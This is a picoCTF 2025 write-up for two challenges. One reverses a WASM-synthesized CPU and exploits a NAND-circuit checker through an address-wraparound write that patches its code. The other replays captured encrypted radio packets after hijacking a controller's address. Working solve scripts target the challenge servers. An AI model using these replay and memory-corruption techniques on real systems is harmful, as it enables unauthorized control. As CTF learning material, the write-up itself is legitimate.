# picoCTF 2025 Writeups
## Pachinko Revisited
### writeup
We are given partial source for the remote server, with the source for the CPU missing. Instead we have a wasm binary that executes a single internal cycle of the processor via the exported `process` function.
Decompiling the wasm binary in Ghidra and inspecting the `process` function shows a few thousand lines of bitwise operations, mostly xors and ands. Given that the `synth_cpu` macro most likely synthesizes Verilog output into some Rust equivalent, we can assume that this giant block of bitwise logic is the compiled Verilog code.
```py=
bVar17 = state[0x43]
state[0x48] = bVar17 ^ 0xff
bVar16 = state[0x46]
state[0x49] = bVar16 ^ 0xff
....
bVar22 = bVar16 & state[0x66] ^ 0xff
state[0x47c] = bVar22
bVar22 = bVar22 & bVar30
```
We can extract this code from ghidra into python since it is all bitwise operators and array indexing.
Looking at the server js, we can see a list of the port definitions for the processor:
```javascript=
return {
    clock: getBitFromJson(json, "clock"),
    addr: getBitsFromJson(json, "addr"),
    inp_val: getBitsFromJson(json, "inp_val"),
    out_val: getBitsFromJson(json, "out_val"),
    reset: getBitFromJson(json, "reset"),
    write_enable: getBitFromJson(json, "write_enable"),
    halted: getBitFromJson(json, "halted"),
    flag: getBitFromJson(json, "flag"),
};
```
We can infer from how the code splits the port bits and from the size of the memory array that `inp_val`, `out_val`, and `addr` are each 16 bits wide. `clock`, `reset`, `write_enable`, `halted`, and `flag` are all single-bit ports.
Since verilog requires input or output annotation on ports, you would expect that any input ports used in the CPU would be read from the state array, but never written to.
Checking this assumption yields 18 bits of state that are read but never written to:
```
00 state[0x13]
01 state[0x14]
02 state[0x15]
03 state[0x16]
04 state[0x17]
05 state[0x18]
06 state[0x19]
07 state[0x1a]
08 state[0x1b]
09 state[0x1c]
10 state[0x1d]
11 state[0x1e]
12 state[0x1f]
13 state[0x20]
14 state[0x21]
15 state[0x22]
16 state[0x44]
17 state[2]
```
16 consecutive bits and 2 standalone bits. This matches up with the expected input ports, `inp_val`, `clock`, and `reset`. The consecutive run of bits is likely to be `inp_val`, while the `clock` and `reset` are unknown.
Next we need to determine the offsets of the rest of the ports. Since memory is external the processor will need to fetch each instruction from memory on every cycle. We expect that the `addr` output port will increment by at least 2 on every cycle.
We can check this with a script to iterate over all sequences of 16 bits of the state array and look for changes that increment by 2. Here we can also check which offsets of `clock` and `reset` are correct. If we guess `clock` and `reset` wrong, we expect that an increment of 2 will not appear since the clock is not stepping. Checking the 2 possible combinations of `clock` and `reset` shows that the expected increment of 2 only appears with `clk` offset of `0x02` and `reset` offset of `0x44`. The increment also only appears in bits `0x12:0x03`, which is most likely the `addr` output port.
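The window scan described above can be sketched roughly as follows. This is a minimal illustration, not the script we actually ran: it assumes each state snapshot has already been reduced to a list of 0/1 bits, that ports are stored least significant bit first, and that one snapshot is taken per full clock cycle. The names `window_value`, `find_incrementing_windows`, and `make_snapshot` are made up for this example.

```python
def window_value(bits, start, width=16):
    """Interpret bits[start:start+width] as a little-endian integer (assumed bit order)."""
    return sum(bit << i for i, bit in enumerate(bits[start:start + width]))


def find_incrementing_windows(snapshots, step=2, width=16):
    """Return every start offset whose window grows by exactly `step` between snapshots."""
    hits = []
    nbits = len(snapshots[0])
    for start in range(nbits - width + 1):
        values = [window_value(s, start, width) for s in snapshots]
        deltas = {(b - a) % (1 << width) for a, b in zip(values, values[1:])}
        if deltas == {step}:
            hits.append(start)
    return hits


def make_snapshot(counter, clock, nbits=32, offset=3):
    """Synthetic state for the demo: a clock bit at 0 and a 16-bit counter at `offset`."""
    bits = [0] * nbits
    bits[0] = clock
    for i in range(16):
        bits[offset + i] = (counter >> i) & 1
    return bits


# Synthetic trace: the counter advances by 2 each cycle, like an instruction fetch address.
snapshots = [make_snapshot(2 * k, k & 1) for k in range(8)]
hits = find_incrementing_windows(snapshots)
print(hits)
```

Against the real state array the same loop would be run once per candidate `clock`/`reset` assignment, keeping only the assignment that produces a hit.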
Currently known ports look like:
```
02 - => clk
03 - 12 => addr probably
13 - 22 => inp_val
23 - 32 => ??
33 - 42 => ??
43 - => ??
44 - => reset
45 - => ??
46 - => ??
```
This is just enough to start executing instructions, since we can respond to memory reads (but not memory writes yet). Looking at the two provided binaries (`nand_checker.bin` and `flag.bin`), we noticed that both end in `0x000f`. This is most likely the `halt` instruction, and executing it does halt the CPU, which confirms the guess.
From here we just need to figure out the `out_val` offset, so we execute the `nand_checker` binary and look at which port (`0x32:0x23` or `0x42:0x33`) outputs values that look like they are being written to memory. Running `nand_checker` shows that `0x42:0x33` seems to increment by 4 every instruction, while `0x32:0x23` outputs constants that we know are written to memory. This tells us that `0x42:0x33` is probably the program counter, since the instructions are probably 4 bytes wide, and that `0x32:0x23` is `out_val`.
With most of the port offsets reversed, we can figure out which offsets correspond to `write_enable` and `halted` by running instructions from `nand_checker` and inspecting the behavior of nearby offsets `43`, `45`, `46`, `47`, `48`. Observing these bits shows that `46` is most likely `halted` and `45` is most likely `write_enable`.
Now that we have all the ports needed to properly run the cpu, we can start reversing the behavior of `nand_checker`. We know that the program is simulating the behavior of `nand` gates, and that certain inputs/outputs are placed at constant addresses in memory. Using this information and our local cpu implementation we start to slowly reverse the behavior of the instructions.
```x86asm
; nand_checker.bin
0x0000 load_imm r4, 0x3000
0x0004 load_imm r5, 0x1000
0x0008 load_imm r6, 0x2000
0x000c load_imm r0, 0x0
0x000e add r0, r4
0x0010 load_imm r2, 0x1000
0x0014 load r1, [r0]
0x0016 add_imm r0, 0x2
0x0018 jmp_if_0 r1, 0x22
0x001a r1 = (r1 < r2)
0x001c jmp_if_0 r1, 0x4c
0x001e load_imm r1, 0x0
0x0020 jmp_if_0 r1, 0x14
0x0022 load r0, [r4]
0x0024 add_imm r4, 0x2
0x0026 load r1, [r4]
0x0028 add_imm r4, 0x2
0x002a load r2, [r4]
0x002c add_imm r4, 0x2
0x002e jmp_if_0 r0, 0x4c
0x0030 jmp_if_0 r1, 0x4c
0x0032 jmp_if_0 r2, 0x4c
0x0034 shl r0, 1
0x0036 shl r1, 1
0x0038 shl r2, 1
0x003a add r0, r6
0x003c add r1, r6
0x003e add r2, r6
0x0040 load r0, [r0]
0x0042 load r1, [r1]
0x0044 nand r0, r1
0x0046 store [r2], r0
0x0048 load_imm r7, 0x0
0x004a jmp_if_0 r7, 0x22
0x004c load r0, [r5]
0x004e load_imm r1, 0xffff
0x0052 load_imm r2, 0x2
0x0054 load_imm r7, 0x0
0x0056 add r5, r2
0x0058 add r6, r2
0x005a load r3, [r5]
0x005c load r4, [r6]
0x005e r3 = (r7 < r3)
0x0060 r4 = (r7 < r4)
0x0062 add r3, r4
0x0064 jmp_if_0 r3, 0x6c
0x0066 r3 = (r3 < r2)
0x0068 jmp_if_0 r3, 0x6c
0x006a jmp_if_0 r7, 0x72
0x006c add r0, r1
0x006e jmp_if_0 r0, 0x7e
0x0070 jmp_if_0 r7, 0x56
0x0072 load_imm r0, 0x3333
0x0076 load_imm r5, 0x1000
0x007a store [r5], r0
0x007c halt
0x007e load_imm r0, 0x1337
0x0082 load_imm r5, 0x1000
0x0086 store [r5], r0
0x0088 halt
```
```x86asm
; flag.bin
0x0000 load_imm r0, 0x6f73
0x0004 load_imm r1, 0x6563
0x0008 load_imm r2, 0x2e69
0x000c load_imm r3, 0x6f00
0x0010 flag_magic
0x0012 halt
```
Now we can inspect the behavior of `nand_checker`. It reads the circuit node offsets at `0x3000` and validates that each number is less than `0x1000`. Then it performs the actual processing of the input nand circuit and finally checks the input state against the expected output state.
In order to get the flag, we need to load magic numbers into registers `r0` through `r3` and execute the `flag_magic` instruction. However the `nand_checker` program never executes the `flag_magic` instruction. Since the program instructions and input/output are all located in the same memory space, the intended solution likely involves overwriting `nand_checker` with a new program that will execute the instructions to set the flag bit.
We noticed that while the program validates that the circuit nodes are all less than `0x1000`, it multiplies them by 2 before using them to index the `inputs` array at `0x2000`. Any node index of `0x800` or above therefore resolves to an address of `0x3000` or higher, which means we can modify the circuit nodes at `0x3000` while the program is processing them.
Writing `0xfff` to the output node of a nand gate, then inverting it to `0xf000`, will generate an offset of `0xe000` when scaled by 2. `(0xe000 + 0x2000) & 0xffff == 0x0000`, which lets us modify the instructions of `nand_checker`. From here we just need to patch the `nand r0, r1` instruction to `add r0, r1`, which allows us to construct a 2 byte arbitrary write primitive.
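To make the wraparound concrete, here is a small Python model of the two loops as we read them from the disassembly above. It is a sketch under assumptions: memory is modeled as a dict from byte address to 16-bit word, unset words read as 0, and the function names `validate` and `run_gates` are ours, not the challenge's.

```python
MASK = 0xFFFF


def validate(mem, circuit_base=0x3000, limit=0x1000):
    """Pre-check: every circuit word up to the first zero must be below `limit`."""
    ptr = circuit_base
    while True:
        word = mem.get(ptr, 0)
        ptr += 2
        if word == 0:
            return True
        if not word < limit:
            return False


def run_gates(mem, circuit_base=0x3000, state_base=0x2000):
    """Gate loop: fetch (in1, in2, out), scale each by 2, add the base, store the NAND."""
    ptr = circuit_base
    while True:
        a, b, o = mem.get(ptr, 0), mem.get(ptr + 2, 0), mem.get(ptr + 4, 0)
        ptr += 6
        if a == 0 or b == 0 or o == 0:
            return
        addr_a = ((a << 1) + state_base) & MASK
        addr_b = ((b << 1) + state_base) & MASK
        addr_o = ((o << 1) + state_base) & MASK  # 16-bit wraparound happens here
        mem[addr_o] = ~(mem.get(addr_a, 0) & mem.get(addr_b, 0)) & MASK


# Gate 0 inverts circuit word 5 in place (index 0x805 -> address 0x300a).
# Gate 1 then uses that word, now 0xf000, as its output node.
words = [0x805, 0x805, 0x805, 0x001, 0x001, 0xFFF]
mem = {0x3000 + 2 * i: w for i, w in enumerate(words)}

passed_check = validate(mem)
run_gates(mem)
patched_output_field = mem[0x300A]
written_to_code = mem[0x0000]
print(passed_check, hex(patched_output_field), hex(written_to_code))
```

Every word passes the `< 0x1000` check when it is validated, but by the time gate 1 runs its output node has been rewritten, so its store lands at address `0x0000` inside the program.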
From here exploitation is simple. We overwrite the instructions after the nand processing loop with the instructions from `flag.bin`. Once the cpu halts the flag bit will be set and we get the second flag.
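The words that get written can be derived from the `flag.bin` disassembly and the opcode layout used by the disassembler script (low nibble is the opcode, the next nibble is the register). The sketch below is only an illustration of that encoding; `load_imm`, `payload`, and `patches` are names made up here, and the start address `0x4c` is the target of the loop-exit jumps in `nand_checker`.

```python
def load_imm(reg, imm):
    """Encode the 4-byte load_imm as two 16-bit words: opcode 0xd plus register, then the immediate."""
    return [0xD | (reg << 4), imm & 0xFFFF]


FLAG_MAGIC = 0x000E  # opcode 0xe
HALT = 0x000F        # opcode 0xf

# Magic values for r0..r3, as seen in flag.bin.
payload = []
for reg, imm in enumerate([0x6F73, 0x6563, 0x2E69, 0x6F00]):
    payload += load_imm(reg, imm)
payload += [FLAG_MAGIC, HALT]

# The gate loop exits to 0x4c, so the payload is placed there, one word every 2 bytes.
START = 0x4C
patches = {START + 2 * i: word for i, word in enumerate(payload)}

for addr, word in patches.items():
    print(f"{addr:#06x} (word {addr >> 1}): {word:#06x}")
```

The resulting word indices run from 38 to 47, which are the offsets added to `0xf000` in the solve script's `write` calls.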
### scripts
#### solve script
```py=
import requests

IN1, IN2, IN3, IN4 = range(5, 9)
OUT1, OUT2, OUT3, OUT4 = range(1, 5)


def con(a: int, b: int, o: int):
    return { "input1": a, "input2": b, "output": o }


def num(n: int, const: int, dest: int):
    r = []
    for b in f"{n:0b}"[1:]:
        r.append(con(dest, dest, dest))
        if b == "1":
            r.append(con(0 + const, dest, dest))
    return r


def write(base: int, addr: int, n: int):
    # int.bit_count() requires Python 3.10+
    total = base - 4 + addr.bit_length() + addr.bit_count() + n.bit_length() + n.bit_count()
    total *= 3
    const = total + 3
    r = [
        *num(addr, 0x800 + const, 0x800 + total + 2),
        *num(n, 0x800 + const, 0x800 + const + 1),
        con(0xff0, 0x800 + const + 1, 1),
        con(1, 1, 1),
    ]
    return r


A = 0
B = A + 6
TARGET = A + 10 * 3
circ = [
    con(0xfff, 0xfff, 0xfff),
    con(0xfff, 0xfff, 0xfff),
    con(0x22, 0x101, 0x101),
    con(0x800 + A + 0, 0x800 + A + 1, 0x800 + TARGET + 2),
    con(0x800 + A + 2, 0x800 + A + 3, 0x800 + TARGET + 2),
    con(0x800 + A + 4, 0x800 + A + 5, 0x800 + TARGET + 2),
    con(0x800 + TARGET + 2, 0x800 + TARGET + 2, 0x800 + TARGET + 2),
    con(0x800 + B + 0, 0x800 + B + 0, 0x800 + B + 0),
    con(0x800 + TARGET + 2, 0x800 + B + 0, 0x800 + TARGET + 2),
    con(0x800 + B + 1, 0x800 + B + 1, 0x800 + B + 2),
    con(0x800 + B + 2, 0x800 + B + 2, 1),
]
# overwrite words 38..47 (addresses 0x4c..0x5e) with the flag.bin instructions
circ.extend(write(len(circ), 0xf000 + 38, 0x0d))
circ.extend(write(len(circ), 0xf000 + 39, 0x6f73))
circ.extend(write(len(circ), 0xf000 + 40, 0x1d))
circ.extend(write(len(circ), 0xf000 + 41, 0x6563))
circ.extend(write(len(circ), 0xf000 + 42, 0x2d))
circ.extend(write(len(circ), 0xf000 + 43, 0x2e69))
circ.extend(write(len(circ), 0xf000 + 44, 0x3d))
circ.extend(write(len(circ), 0xf000 + 45, 0x6f00))
circ.extend(write(len(circ), 0xf000 + 46, 0x0e))
circ.extend(write(len(circ), 0xf000 + 47, 0x0f))

HOST = "http://activist-birds.picoctf.net:61075/"
res = requests.post(f"{HOST}/check", json={
    "circuit": circ
})
print(res.status_code)
print(res.text)
print(res.json())
```
#### readonly/writeonly script
```py=
import re

# prog.txt holds the assignments extracted from the ghidra decompilation
prog = open("prog.txt").read()
lines = prog.strip().splitlines()
reads = []
writes = []
for line in lines:
    d, s = line.strip().split(" = ")
    reads.extend(re.findall(r"state\[.+?\]", s))
    if d.startswith("state"):
        writes.append(d)

# state entries that are assigned but never read (low offsets only)
writeonly = set()
for w in writes:
    if w not in reads:
        o = w.split("[")[1]
        o = o.split("]")[0]
        o = int(o, 0)
        if o > 0x100:
            continue
        writeonly.add(w)

# state entries that are read but never assigned
readonly = set()
for r in reads:
    if f"{r} =" not in prog:
        readonly.add(r)

print(f"READONLY")
for i, r in enumerate(sorted(readonly)):
    print(f"{i+1:02} {r}")
print(f"WRITEONLY")
for i, r in enumerate(sorted(writeonly)):
    print(f"{i+1:02} {r}")
```
#### analysis script
```py=
from cpu import *
import copy
import colorama


class Machine:
    def __init__(self):
        self.state = bytearray([0] * 100_000)
        self.insns = None
        self.inputs = None
        self.outputs = None
        self.circuit = None
        self.iters = 0

    @property
    def v(self):
        return BitView(self.state)

    def reset(self):
        run(self.state)
        self.v[I_RST] = 1
        run(self.state)
        self.v[I_RST] = 0
        run(self.state)

    def save(self):
        self.saved_state = bytearray(len(self.state))
        self.saved_state[:] = self.state
        self.saved_insns = copy.deepcopy(self.insns)
        self.saved_inputs = copy.deepcopy(self.inputs)
        self.saved_outputs = copy.deepcopy(self.outputs)
        self.saved_iters = self.iters
        self.saved_circuit = copy.deepcopy(self.circuit)

    def restore(self):
        self.state = self.saved_state
        self.insns = self.saved_insns
        self.inputs = self.saved_inputs
        self.outputs = self.saved_outputs
        self.iters = self.saved_iters
        self.circuit = self.saved_circuit

    def step(self, hijack: int = None, show = True):
        self.iters += 1
        self.v[I_CLK] ^= 1
        run(self.state)
        c = self.v[0x02] # clk
        d = self.v[0x03:0x13] # addr
        e = self.v[0x13:0x23] # inp val
        f = self.v[0x23:0x33] # out val
        g = self.v[0x33:0x43] # pc probably
        h = self.v[0x43] # ??
        i = self.v[0x44] # reset
        j = self.v[0x45] # write enable
        k = self.v[0x46] # halt
        l = self.v[0x47] # flag maybe?
        m = self.v[0x48]
        n = self.v[0x49]
        o = self.v[0x4a]
        # if j == 1:
        # if l == 1:
        #     print(c, f"{d:08x}", f"{e:08x}", f"{f:08x}", h, i, f"w={j}", f"h={k}", f"f={l}", m, n, o)
        #     break
        if show:
            print(c, f"{d:08x}", f"{e:08x}", f"{f:08x}", f"pc={g:04x}", h, i, f"w={j}", f"h={k}", f"f={l}", m, n, o)
        addr = self.v[O_ADDR:O_ADDR+0x10]
        # assert (addr & 1) == 0, f"{addr:04x}"
        if self.v[I_CLK] == 0:
            # memory write: route the store to the region the address falls in
            if self.v[O_WREN] == 1:
                print(f"writing to {addr:04x}")
                print([f"{hex(i)}" for i in self.circuit[TARGET-3:TARGET+3]])
                if addr >= 0x3000:
                    self.circuit[(addr - 0x3000) >> 1] = self.v[O_DATA:O_DATA+0x10]
                elif addr >= 0x2000:
                    self.inputs [(addr - 0x2000) >> 1] = self.v[O_DATA:O_DATA+0x10]
                elif addr >= 0x1000:
                    self.outputs[(addr - 0x1000) >> 1] = self.v[O_DATA:O_DATA+0x10]
                else:
                    self.insns [(addr - 0x0000) >> 1] = self.v[O_DATA:O_DATA+0x10]
            # memory read: feed the addressed word back on inp_val
            # print(f"reading from {addr:04x}")
            if addr < 0x1000:
                # print(f"{addr = :#x}")
                try:
                    self.v[I_DATA:I_DATA+0x10] = hijack or self.insns[addr >> 1]
                except IndexError:
                    print(f"insn fetch error")
                    return False
            elif addr >= 0x4000:
                pass
            # cases in descending order
            elif addr >= 0x3000:
                self.v[I_DATA:I_DATA+0x10] = self.circuit[(addr - 0x3000) >> 1]
            elif addr >= 0x2000:
                self.v[I_DATA:I_DATA+0x10] = self.inputs [(addr - 0x2000) >> 1]
            elif addr >= 0x1000:
                self.v[I_DATA:I_DATA+0x10] = self.outputs[(addr - 0x1000) >> 1]
        return not self.v[O_HALT]
IN1, IN2, IN3, IN4 = range(5, 9)
OUT1, OUT2, OUT3, OUT4 = range(1, 5)
def con(a: int, b: int, o: int):
    return { "input1": a, "input2": b, "output": o }

circ = [
    con(IN1, IN1, OUT1),
    con(IN2, IN2, OUT2),
    con(IN3, IN3, OUT3),
    con(IN4, IN4, OUT4),
]

def num(n: int, const: int, dest: int):
    r = []
    for b in f"{n:0b}"[1:]:
        r.append(con(dest, dest, dest))
        if b == "1":
            r.append(con(0 + const, dest, dest))
    return r

def write(base: int, addr: int, n: int):
    total = base - 4 + addr.bit_length() + addr.bit_count() + n.bit_length() + n.bit_count()
    total *= 3
    const = total + 3
    r = [
        *num(addr, 0x800 + const, 0x800 + total + 2),
        *num(n, 0x800 + const, 0x800 + const + 1),
        con(0xff0, 0x800 + const + 1, 1),
        con(1, 1, 1),
    ]
    return r
# writes = [
# *num(0x0f)
# ]
A = 0
B = A + 6
TARGET = A + 10 * 3
circ= [
con(0xfff, 0xfff, 0xfff),
con(0xfff, 0xfff, 0xfff),
con(0x22, 0x101, 0x101),
con(0x800 + A + 0, 0x800 + A + 1, 0x800 + TARGET + 2),
con(0x800 + A + 2, 0x800 + A + 3, 0x800 + TARGET + 2),
con(0x800 + A + 4, 0x800 + A + 5, 0x800 + TARGET + 2),
con(0x800 + TARGET + 2, 0x800 + TARGET + 2, 0x800 + TARGET + 2),
con(0x800 + B + 0, 0x800 + B + 0, 0x800 + B + 0),
con(0x800 + TARGET + 2, 0x800 + B + 0, 0x800 + TARGET + 2),
con(0x800 + B + 1, 0x800 + B + 1, 0x800 + B + 2),
con(0x800 + B + 2, 0x800 + B + 2, 1),
]
circ.extend(write(len(circ), 0xf000 + 38, 0x0d))
circ.extend(write(len(circ), 0xf000 + 39, 0x6f73))
circ.extend(write(len(circ), 0xf000 + 40, 0x1d))
circ.extend(write(len(circ), 0xf000 + 41, 0x6563))
circ.extend(write(len(circ), 0xf000 + 42, 0x2d))
circ.extend(write(len(circ), 0xf000 + 43, 0x2e69))
circ.extend(write(len(circ), 0xf000 + 44, 0x3d))
circ.extend(write(len(circ), 0xf000 + 45, 0x6f00))
circ.extend(write(len(circ), 0xf000 + 46, 0x0e))
circ.extend(write(len(circ), 0xf000 + 47, 0x0f))
circuit: list[int] = []
for c in circ:
    circuit.append(c["input1"])
    circuit.append(c["input2"])
    circuit.append(c["output"])
# circuit = [0xffff, 0xffff, 0xffff]
circuit.extend([0] * 0x2000)
# pc=001a insn=1712 r0=3002 r1=0001 r2=1000 r3=0000 r4=3000 r5=1000 r6=2000 r7=0000
# pc=0060 insn=4774 r0=0004 r1=ffff r2=0002 r3=0000 r4=0001 r5=1002 r6=2002 r7=0000
A = 0xffff
B = 0x0000
inputs = [0] * 5 + [0, 0, 0, 0] + [0] * 0x1000
outputs = [0x0004, 0, 0, 0, 0] + [0] * 0x1000
insns = open("programs/nand_checker.bin", "rb").read()
insns = [int.from_bytes(insns[i:i+2], "little") for i in range(0, len(insns), 2)]
insns += [0x0f] * 16
import copy
def create():
    m = Machine()
    m.insns = copy.copy(insns)
    m.inputs = copy.copy(inputs)
    m.outputs = copy.copy(outputs)
    m.circuit = copy.copy(circuit)
    return m
# m = create()
# while m.step(show=True):
# pass
# exit(1)
import pickle
regs = [f"r{i}" for i in range(8)]
sizes = {
0xd: 4,
0xc: 2,
0x8: 2,
0xb: 2,
0x4: 2,
0x7: 2,
0x1: 2,
0x6: 2,
0x9: 2,
0xf: 2,
}
try:
    dump = pickle.load(open("dump.pk", "rb"))
except:
    dump = {
        0: {}
    }
prev = {}
for reg in regs:
    prev[reg] = 0
pc = max(dump.keys())
m = create()
show = False
for i in range(MAX):
    dump[pc] = {}
    # m.step()
    # if m.v[O_HALT] == 1:
    #     break
    # run until the pc moves on to the next instruction fetch
    while m.v[O_PC:O_PC+0x10] == pc or (m.v[O_PC:O_PC+0x10] != m.v[O_ADDR:O_ADDR+0x10]):
        m.step(show=show)
        if m.v[O_HALT] == 1:
            print(m.iters)
            print("done")
            raise RuntimeError()
    idx = pc >> 1
    size = 0
    size = sizes[insns[idx] & 0b1111]
    new = m.v[O_PC:O_PC+0x10]
    ib = m.insns[idx:idx+(size>>1)]
    ib = " ".join(f"{n&0xff:02x}{n>>8:02x}" for n in ib)
    # print(f"{new = :#x}")
    # print("DUMPING")
    for j in range(len(regs)):
        m.save()
        reg = regs[j]
        if reg not in dump[pc]:
            # hijack the fetch with a load so the register value shows up on addr
            insn = 0b1011 | (j << 3) | (j << 8)
            m.v[I_DATA:I_DATA+0x10] = insn
            m.step(hijack=insn, show=False)
            try:
                m.step(hijack=insn, show=False)
            except: pass
            dump[pc][reg] = m.v[O_ADDR:O_ADDR+16]
        m.restore()
        pass
    coloring = [reg not in prev or prev[reg] != dump[pc][reg] for reg in regs]
    regdump = [f"{r}={dump[pc][r]:04x}" for r in regs]
    regdump = [f"{colorama.Fore.LIGHTRED_EX}{r}{colorama.Fore.RESET}" if c else r for (c, r) in zip(coloring, regdump)]
    regdump = " ".join(regdump)
    print(f"{pc=:04x} insn={ib:<9} {regdump}")
    # print("DONE")
    prev = dump[pc]
    pc = new
```
#### disassembler script
```py=
import io
import sys


def split_upper(upper: int):
    return (upper & 0xf), (upper >> 4) & 0xf


class Diassem:
    def __init__(self, bytes):
        self.b = io.BytesIO(bytes)

    def read_op_regs(self):
        bt = self.b.read(2)
        if len(bt) < 2: raise Exception("out of instructions")
        # low nibble of the first byte is the opcode, high nibble the first register
        op = bt[0] & 0xf
        reg1 = (bt[0] >> 4) & 0xf
        return op, reg1, bt[1]

    def disassem(self):
        out = []
        try:
            lut = [
                self.read_0, # 0
                self.read_1, # 1
                self.read_stub, # 2
                self.read_stub, # 3
                self.read_4, # 4
                self.read_stub, # 5
                self.read_6, # 6
                self.read_7, # 7
                self.read_8, # 8
                self.read_9, # 9
                self.read_stub, # a
                self.read_b, # b
                self.read_c, # c
                self.read_d, # d
                self.read_e, # e
                self.read_f, # f
            ]
            while True:
                op, reg1, upper = self.read_op_regs()
                out.append(f"0x{(self.b.tell() - 2):04x}\t" + lut[op](op, reg1, upper))
        except Exception as e:
            print(e)
        finally:
            print("\n".join(out))

    def read_stub(self, op, reg1, reg2):
        return f"??? {op} r{reg1} {reg2}"

    def read_0(self, op, reg1, upper):
        return f"nop"

    def read_1(self, op,reg1, upper):
        # owen insisted
        if reg1 == upper: return f"shl r{reg1}, 1"
        return f"add r{reg1}, r{upper}"

    def read_4(self, op, reg1, upper):
        return f"add_imm r{reg1}, {hex(upper)}"

    def read_6(self, op, reg1, upper):
        return f"nand r{reg1}, r{upper}"

    def read_7(self, op, reg1, upper):
        reg2, reg3 = split_upper(upper)
        return f"r{reg1} = (r{reg3} < r{reg2})"

    def read_8(self, op, reg1, upper):
        return f"load_imm r{reg1}, {hex(upper)}"

    def read_9(self, op, reg1, reg2):
        return f"store [r{reg1}], r{reg2}"

    def read_b(self, op, reg1, reg2):
        return f"load r{reg1}, [r{reg2}]"

    def read_c(self, op, reg1, addr):
        return f"jmp_if_0 r{reg1}, {hex(addr)}"

    def read_d(self, op, reg1, reg2):
        # the only 4-byte instruction: the immediate follows in the next word
        imm = int.from_bytes(self.b.read(2), "little")
        return f"load_imm r{reg1}, {hex(imm)}"

    def read_e(self, op, reg1, upper):
        return "flag_magic"

    def read_f(self, op, reg1, reg2):
        # flag a halt whose operand bits are not all zero
        return f"halt {'(strange)' if reg1 or reg2 else ''}"


file = open(sys.argv[1], "rb").read()
dis = Diassem(file)
dis.disassem()
```
## Ricochet
1. Notice that changing the address of the controller allows you to MITM the robot -> controller channel
2. Notice that the nonce resets, and that you can reuse the packets that were previously played to make the robot do things without the controller's consent.
3. Notice that sending back the secure_data_request packet to the robot allows the nonce to be incremented without doing anything (not included in the 20 move limit).
Using all this, we can painstakingly put together a handmade solve script to get the flag. It only works some of the time because of race conditions when changing the controller's address.
### solve script
```py=
from asyncio import wait_for
import requests
import time
import json
import copy
from pwn import log, sleep
"""
original RC addr is 16
new RC addr is 0
robot addr is 32
ack and request have empty bodies
"""
TYPE = "msg_type"
DST = "dst"
SRC = "src"
RC = 16
BOT = 32
ME = 1
MSG = "message"
ENC = "encrypted"
SERVER_URL = "http://activist-birds.picoctf.net:51576/"
y = input("reuse? ")
if y.lower() in ["y", "yes"]:
    ALL = json.load(open("radio_rx.json", "r"))
else:
    req = requests.get(SERVER_URL + "/radio_rx")
    print(f"{req.status_code = }")
    ALL = json.loads(req.text)
    with open("radio_rx.json", "w+") as fp:
        json.dump(ALL, fp)
secure_data = {}
secure_data_response = {}
secure_data_ack = {}
secure_data_request = {}
controller_nonce = 0
robot_nonce = 0
# index every captured packet by the nonce it was sent under
for i in ALL:
    if i['msg_type'] == 'secure_data':
        i['dst'] = '0'
        secure_data[robot_nonce] = i
        robot_nonce += 1
    if i['msg_type'] == 'secure_data_response':
        secure_data_response[controller_nonce] = i
        controller_nonce += 1
    if i['msg_type'] == 'secure_data_ack':
        secure_data_ack[controller_nonce] = i
        controller_nonce += 1
    if i['msg_type'] == 'secure_data_request':
        i['dst'] = '0'
        secure_data_request[robot_nonce] = i
        robot_nonce += 1
# Returns a list of messages seen on the air since the last time this function
# was called
def receive_radio_messages():
    messages = requests.get(SERVER_URL+"/radio_rx").json()
    for msg in messages:
        log.info(f"Received message: {msg}")
    return messages

def wait_for_radio_message(type: str):
    all = []
    while True:
        msgs = receive_radio_messages()
        all.extend(msgs)
        for msg in msgs:
            if msg["msg_type"] == type:
                log.info(f"FOUND MSG OF TYPE {type}")
                return all

# [message] argument should be a Python dict object
def inject_radio_message(message, msg_type = None, dst = None, src = None, show = False):
    message = copy.deepcopy(message)
    if msg_type is not None:
        message[TYPE] = msg_type
    if dst is not None:
        message[DST] = dst
    if src is not None:
        message[SRC] = src
    if show:
        log.info(f"injecting: {message}")
    requests.post(SERVER_URL+"/radio_tx", json=message)

def start_robot():
    requests.get(SERVER_URL+"/start")

def stop_robot():
    requests.get(SERVER_URL+"/stop")

def get_board_state():
    return requests.get(SERVER_URL+"/state").json()
start_robot()
wait_for_radio_message("debug")
inject_radio_message({"msg_type": "set_addr", "dst": 16, "src": 1, "new_addr": 0})
a = wait_for_radio_message("secure_data")[-1]
log.info(f"got a = {a.get(ENC)[:16]}")
inject_radio_message(secure_data_ack[2], dst=BOT)
bot_nonce = 3
rc_nonce = 2
wait_for_radio_message("secure_data_request")
for _ in range(10):
    if bot_nonce % 2 == 1:
        bot_msg = secure_data_request[bot_nonce]
    else:
        bot_msg = secure_data_ack[bot_nonce]
    inject_radio_message(bot_msg, dst=BOT, msg_type="secure_data_response")
    wait_for_radio_message("secure_data_request")
    if rc_nonce % 2 == 1:
        inject_radio_message(secure_data_request[rc_nonce], dst=0, src=1)
        wait_for_radio_message("secure_data_response")
    else:
        inject_radio_message(secure_data[rc_nonce], dst=0, src=1)
        wait_for_radio_message("secure_data_ack")
    log.info("incremented BOT and RC")
    bot_nonce += 1
    rc_nonce += 1
    log.info(f"BOT nonce is now {bot_nonce}")
    log.info(f"RC nonce is now {rc_nonce}")
# BOT is still waiting for secure_data_response
# RC is idling
inject_radio_message(secure_data[rc_nonce], dst=0, src=1)
wait_for_radio_message("secure_data_ack")
rc_nonce += 1 # rc nonce is now 13
inject_radio_message({ TYPE: "set_addr", DST: 0, SRC: 1, "new_addr": 16 })
wait_for_radio_message("ack_set_addr")
inject_radio_message(secure_data_request[bot_nonce], dst=16, src=32)
rc_nonce += 1 # rc nonce is now 14
# high nonces should start at 14 now
high = []
for i in range(19):
    print(i)
    high.extend(wait_for_radio_message("secure_data_response"))
log.info(f"ignoring {high[0]}")
high = high[1:]
with open("high.json", "w+") as fp:
    json.dump(high, fp)
# sleep(10)
# a = receive_radio_messages()[-1]
# sleep(.5)
log.info("should be done")
robot_nonce = 14
controller_nonce = 14
for i in high:
    if i['msg_type'] == 'secure_data':
        i['dst'] = '0'
        secure_data[robot_nonce] = i
        robot_nonce += 1
    if i['msg_type'] == 'secure_data_response':
        secure_data_response[controller_nonce] = i
        controller_nonce += 1
    if i['msg_type'] == 'secure_data_ack':
        secure_data_ack[controller_nonce] = i
        controller_nonce += 1
    if i['msg_type'] == 'secure_data_request':
        i['dst'] = '0'
        secure_data_request[robot_nonce] = i
        robot_nonce += 1
log.info(f"done assigning high nonces")
start_robot()
wait_for_radio_message("debug")
